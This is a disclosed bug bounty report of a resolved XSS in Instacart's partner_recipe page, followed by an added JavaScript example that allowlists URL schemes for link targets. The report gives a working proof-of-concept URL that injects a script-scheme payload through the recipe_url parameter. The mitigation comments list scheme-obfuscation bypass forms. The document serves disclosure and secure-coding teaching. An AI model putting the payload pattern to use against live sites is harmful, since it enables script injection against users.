XSS in instacart.com/store/partner_recipe
Medium
Instacart
Reported by karel_origin
Vulnerability Details
Technical details and impact analysis
Please open the following URL:
```
https://www.instacart.com/store/partner_recipe?recipe_url=blocked:alert(1)&partner_name=&ingredients%5B%5D=apples&ingredients%5B%5D=butter&ingredients%5B%5D=Splenda+Brown+Sugar+Blend&ingredients%5B%5D=cinnamon&ingredients%5B%5D=nutmeg&title=Barb%27s+Fried+Apples+-Diabetic-Low+Fat&description=&image_url=%2Fassets%2Fimg%2Fno-recipe-image.jpg
```
and click on the "Barb's Fried Apples -Diabetic-Low Fat" image to trigger the payload.
The affected parameter is `recipe_url`.
Report Details
Additional information and metadata
State: Closed
Substate: Resolved
Bounty: $100.00
Weakness: Cross-site Scripting (XSS) - Generic
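A scheme allowlist for a user-supplied link target such as `recipe_url`, shown as an added example that is not part of the original report and is not Instacart's code or fix. It assumes the parameter is rendered as the `href` of the clickable recipe link (consistent with the click-to-trigger behaviour described above); `safeRecipeHref`, `escapeHtml`, `renderRecipeLink` and the sample values are hypothetical names and constructed inputs.

```javascript
// Added example: only absolute http(s) URLs may become a link target.
const ALLOWED_PROTOCOLS = new Set(['http:', 'https:']);

// Returns a normalized URL string, or `fallback` when the value is unsafe.
function safeRecipeHref(raw, fallback = '#') {
  // Query parsers can yield arrays/objects (e.g. recipe_url[]=...); reject them.
  if (typeof raw !== 'string' || raw.length === 0) return fallback;
  let parsed;
  try {
    // Parse the way a browser does: the WHATWG parser strips leading
    // whitespace and embedded tabs/newlines and lowercases the scheme, so
    // " JaVaScRiPt:" and "java\tscript:" are both seen as "javascript:".
    // No base URL is given, so relative and "//host" values throw.
    parsed = new URL(raw);
  } catch {
    return fallback;
  }
  if (!ALLOWED_PROTOCOLS.has(parsed.protocol)) return fallback;
  return parsed.href; // emit the parsed form, not the raw input
}

// Minimal HTML escaping for text and double-quoted attribute values.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Builds the recipe link from request parameters (constructed shape).
function renderRecipeLink({ recipe_url, title }) {
  const href = escapeHtml(safeRecipeHref(recipe_url));
  const text = escapeHtml(String(title ?? ''));
  return `<a href="${href}" rel="noopener noreferrer">${text}</a>`;
}
```

HTML escaping alone does not stop this class of issue, because a script-scheme URL contains no characters that need escaping; the scheme check is the control that matters for link targets.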